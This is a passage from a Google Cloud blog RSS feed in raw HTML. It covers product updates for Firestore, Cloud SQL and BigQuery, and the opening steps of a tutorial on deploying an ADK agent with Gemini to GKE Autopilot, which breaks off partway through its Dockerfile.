&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We have fundamentally reimagined &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Firestore with pipeline operations for Enterprise edition&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://www.mssqltips.com/sqlservertip/11578/introducing-google-cloud-sql/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Introducing Google Cloud SQL on MSSQLTips&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We are highlighting a new technical guide published on MSSQLTips titled "Introducing Google Cloud SQL." This article serves as an essential resource for SQL Server administrators and developers exploring Google Cloud's fully managed database service. It provides a detailed overview of Cloud SQL capabilities, including high availability, security integration, and the seamless transition of on-premises SQL Server workloads to the cloud, making it an ideal resource for those planning their migration strategy.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the &lt;/span&gt;&lt;strong&gt;&lt;a href="https://medium.com/google-cloud/bridging-the-identity-gap-microsoft-entra-id-integration-with-cloud-sql-for-sql-server-a30207d63035" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Public Preview of Microsoft Entra ID&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (formerly Azure Active Directory) integration with Cloud SQL for SQL Server. Designed to tackle the challenge of identity sprawl in multi-cloud environments, this integration allows organizations to govern database access using their existing Microsoft identity infrastructure. Key benefits include centralized identity management, enhanced security features like Multi-Factor Authentication (MFA), and simplified user administration through direct group mapping. This feature is available for SQL Server 2022 and supports both public and private IP configurations.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;January 12 - January 16&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google-built JDBC Driver for BigQuery is now available in Preview&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the launch of the new, Google-built JDBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for Java applications to BigQuery and is developed entirely in-house by Google. &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/jdbc-for-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Download a new driver and connect your Java application to BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Troubleshoot Airflow tasks instantly with Gemini Cloud Assist investigations:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Cloud Composer just got smarter. We are excited to announce that &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Cloud Assist investigations &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;are now available directly within&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; Cloud Composer 3&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Instead of manually sifting through raw logs, you can now simply click "Investigate" on a failed Airflow task. Gemini analyzes logs and task metadata to identify failure patterns—such as resource exhaustion or timeouts—and provides actionable recommendations driven by Gemini Cloud Assist to resolve the issue. This integration shifts the debugging experience from manual toil to automated root cause analysis, significantly reducing the time required to restore your pipelines.&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/composer/docs/composer-3/troubleshooting-dags#investigations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more about AI-assisted troubleshooting&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-related_article_tout"&gt;





&lt;div class="uni-related-article-tout h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;a href="https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud-2025/"
       data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }'
       class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker"&gt;
      &lt;div class="uni-related-article-tout__inner-wrapper"&gt;
        &lt;p class="uni-related-article-tout__eyebrow h-c-eyebrow"&gt;Related Article&lt;/p&gt;

        &lt;div class="uni-related-article-tout__content-wrapper"&gt;
          &lt;div class="uni-related-article-tout__image-wrapper"&gt;
            &lt;div class="uni-related-article-tout__image" style="background-image: url('https://storage.googleapis.com/gweb-cloudblog-publish/images/whats_new_data_cloud_fWg4bKK.max-500x500.png')"&gt;&lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="uni-related-article-tout__content"&gt;
            &lt;h4 class="uni-related-article-tout__header h-has-bottom-margin"&gt;What’s new with Google Data Cloud - 2025&lt;/h4&gt;
            &lt;p class="uni-related-article-tout__body"&gt;Recent product news and updates from our data analytics, database and business intelligence teams.&lt;/p&gt;
            &lt;div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted"&gt;
              &lt;span class="nowrap"&gt;Read Article
                &lt;svg class="icon h-c-icon" role="presentation"&gt;
                  &lt;use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"&gt;&lt;/use&gt;
                &lt;/svg&gt;
              &lt;/span&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;</description><pubDate>Thu, 04 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/</guid><category>Databases</category><category>Business Intelligence</category><category>Data Analytics</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/whats_new_data_cloud_fWg4bKK.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What’s new with Google Data Cloud</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/original_images/whats_new_data_cloud_fWg4bKK.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>The Google Cloud Data Analytics, BI, and Database teams </name><title></title><department></department><company></company></author></item><item><title>Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot</title><link>https://cloud.google.com/blog/topics/developers-practitioners/scaling-ai-agents-a-step-by-step-guide-to-deploying-adk-on-gke-autopilot/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While building AI agents locally using Google’s Agent Development Kit (ADK) is an excellent way to prototype, production-ready agents require a robust, scalable infrastructure. For developers looking to move beyond simple instances and into the world of managed container orchestration, Google Kubernetes Engine (GKE) Autopilot offers the perfect balance of flexibility and ease of use.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this tutorial, I will walk you through building a technical agent with ADK and deploying it to GKE Autopilot. We will focus on utilizing Gemini on Vertex AI as the core model and ensure highest security standards by implementing Workload Identity for permission management.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Understanding the GKE ADK Architecture&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying an ADK agent on GKE Autopilot involves more than just running a container. We leverage GKE's native capabilities to handle scaling and security. Our architecture consists of an ADK-based Python application packaged as a Docker image and stored in Artifact Registry. This container runs as a Deployment on GKE Autopilot, where it communicates securely with Vertex AI using Workload Identity—mapping a Kubernetes Service Account to a Google Cloud IAM Service Account.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;To expose the agent to the world, we use the Kubernetes Gateway API, the modern successor to Ingress, which provides a cleaner separation of concerns and native support for Google Cloud Load Balancing.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Prerequisites&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Before we begin, ensure you have the following tools and accounts ready:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Python 3.10 or higher.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;uv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for package management.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud SDK (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) installed and configured.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;A Google Cloud project with billing enabled.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command-line tool.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;jq&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for parsing JSON responses.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The following APIs enabled: Kubernetes Engine, Artifact Registry, and Vertex AI.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 0: Configuring Google Cloud and Authentication&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Before interacting with Google Cloud services, you must authenticate your environment and set the active project. This ensures that both the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI and your local Python environment can access Vertex AI.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Login to Google Cloud SDK&lt;/strong&gt;:&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud auth login&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Set your active project&lt;/strong&gt;:&lt;span style="vertical-align: baseline;"&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud config set project [PROJECT_ID]&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Setup Application Default Credentials (ADC)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This is crucial for the ADK library to authenticate with Vertex AI during local testing.&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud auth application-default login&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Define Environment Variables&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: To ensure we can easily reuse our configuration in subsequent steps, let's export our project, region, and cluster name as environment variables. &lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;export PROJECT_ID=$(gcloud config get-value project)
export REGION=us-central1
export CLUSTER_NAME=adk-cluster&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 1: Provisioning GKE Autopilot&lt;/h3&gt;
&lt;p&gt;GKE Autopilot is the recommended way to run Kubernetes without managing nodes. It allows you to focus on your agent deployment while Google manages the infrastructure. Starting the cluster creation now allows it to provision in the background while we build the agent.&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud container clusters create-auto $CLUSTER_NAME --region $REGION&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the cluster is provisioning, we can move on to building our agent.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 2: Building the Agent with ADK&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, let's create our agent. Start by creating a folder for the agent code:&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;mkdir adk-agent
cd adk-agent&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Initialize a new Python project with uv:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv init&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Add dependencies&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv add google-adk&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a new agent using the adk cli&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv run adk create weather_agent&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;You will be asked to choose a model for the root agent. Choose &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemini-2.5-flash&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (Number 1). Next you will be asked to choose a backend. Choose &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Vertex AI&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (Number 2). Next you will be asked to enter your Google Cloud project ID. Enter your project ID. Next you will be asked to enter your Google Cloud region. Choose a region of your choice. Example: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;us-central1&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The previous command scaffolded a new directory &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_agent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the following structure:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;weather_agent/
├── .env
├── __init__.py
└── agent.py&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ADK requires the agent code to be in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;agent.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file. Let's edit the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;agent.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file to add a simple tool for the agent.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-python"&gt;&lt;code&gt; from google.adk import Agent
# Define a simple tool for the agent
def get_weather(city: str) -&amp;gt; str:
    """Returns the current weather in a city."""
    return f"The weather in {city} is 90 degrees Fahrenheit and sunny."
# Initialize the agent with Vertex AI and Gemini
root_agent = Agent(
    name="weather_agent",
    model="gemini-2.5-pro",
    tools=[get_weather]
)&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;agent.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file is the entry point for the agent. It is used to define the agent and its tools. The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;get_weather&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; function is a simple tool that returns the current weather in a city. For the purpose of this tutorial, we are using a hardcoded value for the weather. In a real-world scenario, you would use an API to get the current weather.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 3: Testing the Agent Locally&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before deploying the agent to GKE Autopilot, we need to test it locally to ensure it works as expected. Run the following command to start the agent in debug mode with the web UI:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;uv run adk web&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Open &lt;/span&gt;&lt;a href="http://localhost:8000" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;http://localhost:8000&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in your browser and you should see the ADK web UI. You can then interact with your agent by typing messages in the chat interface.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;If the agent returns a message like "The weather in [CITY] is 90 degrees Fahrenheit and sunny." Congratulations! your ADK agent is working. Now you can proceed to the next step.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 4: Preparing for GKE Autopilot&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The ADK cli has a built-in command to deploy the agent to GKE Autopilot. However the default settings are not suitable for a production environment. For example, the default settings do not use Workload Identity for authentication with Vertex AI and to expose the Web UI via a Load Balancer on port 80.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will instead manage the lifecycle of the container ourselves. First we need to containerize the agent.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.dockerignore&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;adk-agent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory to prevent your local virtual environment from being copied into the image:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;.venv
.adk
__pycache__
*.pyc
.env&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Dockerfile&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for your agent in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;adk-agent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory. We will use a multi-stage build to keep the final production image lightweight and secure:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;# Stage 1: Build the virtual environment
FROM python:3.10-slim AS builder

# Install uv
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/

# Set working directory
WORKDIR /app

# Force uv to use the system Python and use copy instead of symlinks
ENV UV_PYTHON_PREFERENCE=only-system
ENV UV_LINK_MODE=copy
ENV UV_COMPILE_BYTECODE=1
ENV UV_PYTHON=/usr/local/bin/python3

# Install dependencies
# We copy only files needed for installation to maximize cache
COPY pyproject.toml uv.lock ./
# Note: We don't use --frozen yet as the host lock file might be slightly out of sync
# but sync will update it in the builder stage.
RUN uv sync --no-install-project --no-dev --no-cache

# Copy the agent code
COPY . .
# Sync the project itself
RUN uv sync --no-dev --no-cache

# Stage 2: Runtime image
FROM python:3.10-slim

